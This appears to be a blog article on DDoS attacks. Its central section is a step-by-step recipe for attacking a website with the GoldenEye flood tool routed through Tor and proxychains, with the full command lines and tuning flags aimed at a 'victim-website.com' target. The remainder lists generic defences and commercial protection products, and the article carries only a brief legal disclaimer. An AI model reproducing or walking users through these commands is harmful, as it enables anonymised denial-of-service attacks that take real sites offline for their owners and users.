DDoS – a hacker attack on a computer system in order to bring it to failure, that is, to create conditions under which conscientious users of the system can not get access to the system resources (servers) provided, or this access will be difficult.
How does this attack work and who uses it?
Each web-server has limitations on the number of requests that the web-server can serve simultaneously. If the number of requests exceeds the allowable limit, the following is quite possible:
- Server slowdown (slowdown of request processing)
- Total denial of service requests
More often than not, intruders seek the second – complete denial of service. Motives may vary: from protecting users from fraudulent sites to banal boredom.
But it should be said that not only attackers but also “white hackers”, i.e. pentesters, use these attacks. With this attack, ethical hackers test the power and ability of web servers to handle large numbers of requests simultaneously.
The way DDoS works is as follows: The attacker creates a network of “zombie computers” (it doesn’t really have to be computers: all devices capable of sending requests are suitable for this attack) and then uses this network to conduct the attack.
Let’s imagine the situation: the maximum weight of traffic that a server can receive is 1 GB. The attacker is trying to reach or overcome this barrier. If it succeeds, the server first slows down and then can lie down.
That’s the interesting thing: how to conduct such an attack? Let us warn you right away – everything described and described below is provided for information purposes only. You can not break other people’s servers, for this may be problems with the law. We have warned you.
- EtherApe is a graphical network monitor that graphically displays network activity. Hosts and links change in size with traffic. Displaying color protocols.
- Service Tor – Tor allows customers and repeaters to offer hidden services. That is, you can offer a web server, SSH server, etc. Without disclosing your IP address to your users.
- Proxychains – the latest version of Proxychains supports SOCKS5, SOCKS4 and HTTP CONNECT. Proxy chains can be mixed with different types of proxies.
- GoldenEye – GoldenEye is a python application designed for security testing purposes only.
How to perform a DDOS attack on a website?
- Start etherape: etherape, a pop-up window will appear which graphically displays network activity.
- Start TOR: service tor start
- Download Goldeneye https://github.com/jseidl/GoldenEye wget https://github.com/jseidl/GoldenEye
- Unpack it to the folder unzip GoldenEye-master.zip
- after downloading.
- Start attack /GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com
- Add values for workers (-w), sockets (-s) and method (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post
If you do not stop an attack, it will “explode” in some cases. To stop the attack, simply press CTRL+C.
Done. After a while the server will be slowed down, and then it will probably lie down.
General Protection against DDOS Attack
- Decrease the speed of the IP connection.
- Utilize IDS, web application firewalls.
- Tweak Connection to IP.
- Secure your DNS servers.
- Install protective equipment. Make sure you have the appropriate security features installed for both your networks and your applications. This includes key tools such as firewalls, network monitoring software and antivirus software, as well as threat monitoring systems. With these, you can monitor basic network traffic and configure alerts for unusual behavior.
- Keep everyone informed. All these systems must be updated to ensure that any bugs or problems are corrected. Detecting threats as early as possible is the best way to prevent DDoS attacks on critical network infrastructures and impact end users.
DDoS Prevention Tools
There are several tools that I recommend to prevent and stop DDoS attacks.
1. Security Event Manager
To track network behavior and mark threats before they become excessive, I like SolarWinds Security Event Manager (SEM).
The ability to respond quickly to a threat is vital, as security initiatives can quickly become useless if they take too long to deploy. SEM includes automatic responses that can block suspicious IP or USB, disable malicious devices or disable their privileges, and destroy applications that behave unexpectedly. This means that delays when dealing with something like a DDoS attack are minimized.
SEM also controls file integrity and USB, so if something looks wrong, it can be stopped.
SolarWinds SEM is available free of charge for a thirty day trial. After that you can see the prices for each node.
Cloudflare offers a flexible and scalable tool that integrates several DDoS prevention methods into one solution. It prevents malicious and malicious traffic from entering your network, while the rest of your network remains functional and high-performance. Cloudflare uses a reputation database to track potential threats from attackers.
Cloudflare costs $200 per month for businesses, but at the enterprise level, you need to contact Cloudflare for a quote.
Imperva DDoS protects the entire network and protects against attacks by handling high-capacity packets. It provides protection against DDoS attacks, both on-demand and on-demand, depending on what suits your business best, and includes automatic updates to dashboards displaying information about attack traffic. The main disadvantage of the Imperva tool is that it is limited in protection against DDoS attacks.